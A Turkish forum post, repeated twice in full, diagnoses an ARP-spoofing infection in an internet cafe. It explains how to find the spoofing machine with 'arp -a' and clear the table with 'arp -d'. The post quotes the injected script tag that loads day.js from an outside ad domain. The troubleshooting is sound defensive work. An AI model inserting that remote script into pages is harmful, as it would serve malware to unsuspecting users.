Merhaba Arkadaşlar,
Az once bir arkadaşımın internet kafesindeki çözülemeyen problemi anlamak için geldim.
Sıkıntı şu;
Bu internet ağını kullanırken girmek istediğiniz tüm sitelerin kaynak kodları içerisinde aşağıdaki gibi kodlar bulunuyor ve interenet hızı muazzam şekilde yavaşlıyor.
Bu şekilde sorun yaşayıp bilgisayarına format atmak isteyenler varsa hiç boşuna format felan atmayı düşünmesin çünkü format atmak çözüm değil. Eğer sisteminizde sağlam bir anti virus varsa içiniz rahat olsun, çünkü virus sizin bilgisayarınızda olmayabilir.
Virus aslında networkdeki bilgisayarlardan birinde bulunuyor ve bu bilgisayar internet ağının getwayinin(modem-router artik ne ise) mac adresini manipule ediyor.
Yani,
GETWAY IP numaranız 10.0.0.2 ise ve mac adresi 00-04-61-a1-24-0a ise.
Networkdeki bilgisayarlardan biri kendi MAC adresini size "00-04-61-a1-24-0a" miş gibi tanıtıyor ve sizin internet trafiğinizi kendisi üzerinden taşımaya başlıyor. Girmiş olduğunuz bir sitede 80 portundan taşınan tüm kaynak kodlarının üstünede kendi java script kodunu ekleyerek size veriyor.
Yapmanız gereken tam olarak komut satırına düşüp(Başlat>Çalıştır>CMD)
ARP -a yazarak aynı mac adresine sahip IP numaralarını tespit etmek. Bu komutu uyguladığınızda karşınıza aşağıdaki gibi ARP tablosu listelenecektir.
Gördüğünüz gibi listede aynı mac(fiziksel makina) adresine sahip 2 IP adresi bulunmakta. 10.0.0.2 numaralı IP adresi bizim modemimizin gerçek IP si olduğuna göre, modemi taklit eden bilgisayar 10.0.0.101 numaralı bilgisayarmış. Şimdi yapmanız gereken bu bilgisayarı tespit edip network kablosunu çekmek daha sonra temiz şekilde bir windows kurmak olacaktır. Bu arada kendi bilgisayarınızdaki komut satırına ARP -d yazarak ARP tablosunu temizlemenizde doğru bir davranış olacaktır.
Hepinize güneşli günler ve bol kazançlar dilerim.
Az once bir arkadaşımın internet kafesindeki çözülemeyen problemi anlamak için geldim.
Sıkıntı şu;
Bu internet ağını kullanırken girmek istediğiniz tüm sitelerin kaynak kodları içerisinde aşağıdaki gibi kodlar bulunuyor ve interenet hızı muazzam şekilde yavaşlıyor.
Kod:
<script language="javascript" SRC="http://ad.5iyy.info/day.js"></script>Bu şekilde sorun yaşayıp bilgisayarına format atmak isteyenler varsa hiç boşuna format felan atmayı düşünmesin çünkü format atmak çözüm değil. Eğer sisteminizde sağlam bir anti virus varsa içiniz rahat olsun, çünkü virus sizin bilgisayarınızda olmayabilir.
Virus aslında networkdeki bilgisayarlardan birinde bulunuyor ve bu bilgisayar internet ağının getwayinin(modem-router artik ne ise) mac adresini manipule ediyor.
Yani,
GETWAY IP numaranız 10.0.0.2 ise ve mac adresi 00-04-61-a1-24-0a ise.
Networkdeki bilgisayarlardan biri kendi MAC adresini size "00-04-61-a1-24-0a" miş gibi tanıtıyor ve sizin internet trafiğinizi kendisi üzerinden taşımaya başlıyor. Girmiş olduğunuz bir sitede 80 portundan taşınan tüm kaynak kodlarının üstünede kendi java script kodunu ekleyerek size veriyor.
Yapmanız gereken tam olarak komut satırına düşüp(Başlat>Çalıştır>CMD)
ARP -a yazarak aynı mac adresine sahip IP numaralarını tespit etmek. Bu komutu uyguladığınızda karşınıza aşağıdaki gibi ARP tablosu listelenecektir.
Kod:
C:\Documents and Settings\XXX>arp -a
Arabirim: 10.0.0.5 --- 0x2
Internet Adresi Fiziksel Adres Tipi
10.0.0.2 00-04-61-a1-24-0a dinamik
10.0.0.7 00-11-09-32-b4-5e dinamik
10.0.0.101 00-04-61-a1-24-0a dinamik
10.0.0.119 00-04-61-a3-ac-5d dinamikGördüğünüz gibi listede aynı mac(fiziksel makina) adresine sahip 2 IP adresi bulunmakta. 10.0.0.2 numaralı IP adresi bizim modemimizin gerçek IP si olduğuna göre, modemi taklit eden bilgisayar 10.0.0.101 numaralı bilgisayarmış. Şimdi yapmanız gereken bu bilgisayarı tespit edip network kablosunu çekmek daha sonra temiz şekilde bir windows kurmak olacaktır. Bu arada kendi bilgisayarınızdaki komut satırına ARP -d yazarak ARP tablosunu temizlemenizde doğru bir davranış olacaktır.
Hepinize güneşli günler ve bol kazançlar dilerim.
